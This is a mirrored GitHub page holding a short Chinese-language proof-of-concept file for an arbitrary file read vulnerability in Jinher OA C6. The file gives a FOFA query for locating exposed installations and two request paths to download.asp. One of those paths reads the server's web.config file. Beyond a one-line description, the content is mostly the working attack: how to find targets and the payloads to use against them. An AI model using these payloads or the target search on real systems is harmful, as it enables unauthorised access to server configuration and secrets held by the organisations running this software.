admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/金和OA-C6-download.jsp任意文件读取漏洞.md

18 lines
476 B
Markdown
Raw Normal View History

6.11更新漏洞
2024-06-11 17:00:43 +08:00
## 金和OA-C6-download.jsp任意文件读取漏洞
金和OA C6 download.jsp文件存在任意文件读取漏洞攻击者通过漏洞可以获取服务器中的敏感信息
## fofa
```
app="Jinher-OA"
```
## poc
```
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=download.asp
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
```
![image-20240609162635854](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406091626910.png)
Reference in New Issue Copy Permalink